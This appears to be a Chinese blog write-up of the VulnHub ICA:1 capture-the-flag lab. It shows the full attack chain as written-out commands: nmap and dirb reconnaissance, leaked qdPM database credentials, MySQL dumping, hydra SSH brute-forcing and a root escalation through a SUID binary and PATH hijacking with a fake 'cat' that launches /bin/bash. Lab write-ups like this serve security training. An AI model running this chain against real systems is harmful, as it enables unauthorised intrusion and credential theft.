每周打靶VulnHub靶机-ICA_ 1

ICA: 1download_site

According to information from our intelligence network, ICA is working on a secret project. We need to find out what the project is. Once you have the access information, send them to us. We will place a backdoor to access the system later. You just focus on what the project is. You will probably have to go through several layers of security. The Agency has full confidence that you will successfully complete this mission. Good Luck, Agent!
根据我们情报网的信息,ICA正在进行一个秘密项目。我们得弄清楚这个项目是什么。一旦你有了访问信息,把它们发给我们。稍后我们将设置后门以访问系统。你只需要专注于项目本身。您可能需要通过几层安全检查。本机构完全相信你会成功地完成这项任务。祝你好运,特工!

1.信息搜集

使用nmap进行域内存活主机扫描
image.png
找到target ip ,继续进行开放端口扫描
image.png
开放了22(ssh)、80(http)、3306(mysql),用浏览器进行访问
image.png
是一个qbPM9.2的登陆页面,继续进行敏感目录扫描

2.数据库

2.1目录扫描(法1)

dirb [http://192.168.43.111/](http://192.168.43.111/)
image.png
找到很多目录,进行尝试访问,
image.png
最终在*/core/config,下发现数据库配置文件
image.png
成功找到数据库用户名qdpmadmin、密码UcVQCMQk2STVeS6J

2.2 查找系统漏洞(法2)

searchsploit qdPM 9.2
image.png
找到两个,咱们用 密码暴露 这个
image.png
密码在一个yml文件里,访问这个地址就可以下载
image.png
同样找到了数据库用户名和密码

3.获取ssh的用户名密码

登陆数据库mysql -uqdpmadmin -pUcVQCMQk2STVeS6J -h 192.168.43.111
image.png
使用staff数据库use staff;
image.png
查看表show tables;
image.png
列出user表select * from user;
image.png
列出login表select * from login;
image.png
login表就应该是对应的密码,base64加密,把密码解密,并且把用户和密码保存的两个文件里
解密网站
image.png

4.hydra爆破ssh

hydra -L users -P passwords ssh://192.168.43.111
image.png
爆破出两个ssh用户

login: travis password: DJceVy98W28Y7wLg
login: dexter password: 7ZwV4qtg42cmUXGX

5.提权

分别登陆
image.png
image.png
travis用户下有一个flagICA{Secret_Project}
但不是root用户的,而且也不可以提权
image.png
尝试另一个用户dexter
image.png

It seems to me that there is a weakness while accessing the system.
As far as I know, the contents of executable files are partially viewable.
I need to find out if there is a vulnerability or not.
在我看来,在进入系统时有一个弱点。据我所知,可执行文件的内容是部分可见的。我需要知道这里是否有漏洞。

这里说到可执行文件,查找有root权限的可执行文件,经过甄别,第一个最可疑
find / -perm -u=s -type f 2>/dev/null
image.png
进入目录,strings 这个文件
image.png
查看到可疑命令
image.png
cat 命令不可以使用,尝试伪造一个cat命令
新建cat命令echo "/bin/bash" > /tmp/cat
image.png
添加环境变量export PATH=/tmp:$PATH
image.png
查看是否写入成功echo $PATH
image.png
查看cat文件
image.png
发现没有执行权限,添加执行权限
image.png
执行 二进制文件
image.png

6.root_flag

image.png
ICA{Next_Generation_Self_Renewable_Genetics}

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值